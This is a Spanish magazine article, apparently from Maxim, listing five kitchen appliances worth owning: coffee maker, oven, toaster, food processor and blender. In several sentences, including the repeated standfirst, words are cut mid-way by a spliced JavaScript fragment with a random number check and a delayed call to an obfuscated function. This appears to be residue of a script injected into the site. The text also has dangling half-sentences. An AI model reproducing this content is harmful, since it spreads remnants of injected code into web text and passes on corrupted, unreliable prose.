Con estos cinco electrodomésticos tendrás una cocina de lujo

    Electrodomésticos que todo hombre debe tener en su cocina

    Con la ayuda tecnológica, poco a poco se han ido integrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando elementos para hacerlos más prácticos, innovadores y con mayor funcionalidad.

    Autor: Redacción Maxim 29 abril, 2021


    Los electrodomésticos son elementos básicos a la hora de equipar una cocina y muchos de ellos se han convertido en los aliados perfectos para preparar cualquier tipo de comida de manera rápida y sencilla.

    via GIPHY

    Aquí te presentamos una lista de aquellos electrodomésticos que debes de tener en tu cocina.

    Cafetera

    Preparar un delicioso café depende de dos cosas: la calidad del grano y el equipo en el que se prepara.

    via GIPHY

    Siéntete como todo un barista profesional dentro de tu casa

    Si eres amante del café, este aparato puede ser uno de los esenciales dentro de tu cocina.

    Lo más recomendable es tener una cafetera que además de poder preparar un café en menos de un minuto, te permiten moler los granos justo antes de la preparación, controlar la temperatura y hacer el microespumado. que te harán

    Horno

    Los hornos son electrodomésticos que ayudan a calentar, tostar, dorar y hornear mucho más rápido, además que ayudan a ahorrar electricidad, tiempo, y la limpieza es más práctica.

    via GIPHY

    Cocina auténticas pizzas estilo «a la leña» en 2 minutos

    Algunos de los hornos tienen hasta 11 funciones de cocción, incluyendo la famosa cocción por aire o Air Fry y deshidratación. Incluso hay algunos que replican los tres tipos de calor generados por un horno de ladrillo, alcanzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los 750ºF.

    Tostadoras

    Hoy en día hay tostadoras que permiten tostar mucho más que sólo el tradicional pan de caja.

    via GIPHY

    Experiencia culinaria

    Gracias a que algunos tienen anchas ranuras, puedes tostar desde bagels hasta bollos anchos, además algunas cuenta con 6 diferentes tipos de configuraciones que ajustan el tiempo de tostado según el tipo de pan.

    Algunas incluso viene con pantallas Led te van indicandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el progreso de cocción.

    Procesadores de alimentos

    Los procesadores de alimentos permiten picar y triturar las comidas de forma ágil y segura, sin necesidad de invertir mucho tiempo o  esfuerzo.

    via GIPHY

    Con tan sólo presionar un botón

    Gracias a los procesadores se puede picar, mezclar, pelar, cortar, triturar y hasta amasar cualquier tipo de alimento.

    Licuadora 

    Uno de los electrodomésticos más funcionales cuya tarea principal es triturar y mezclar los ingredientes.

    via GIPHY

    Las licuadoras pueden una potencia de 1800W, programas de funciones predefinidas. Pueden tritura hielo y hasta prepara sopas.

    Sin ruido

    Por otro lado, si eres de los que les molesta el ruido que hace la licuadora, puedes busca aquellas que tienen una tecnología silenciosa que bloquea el sonido.

    Equipar tu cocina o renovarla puede llegar a ser una actividad abrumadora pues debes comparar precios, marcas y funcionalidades, así que tómate el tiempo que sea necesario para que hagas la elección que más se adapte a tu estilo de vida.

    Temas relacionados con esta nota: , ,

Con la ayuda tecnológica, poco a poco se han ido integrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando elementos para hacerlos más prácticos, innovadores y con mayor funcionalidad.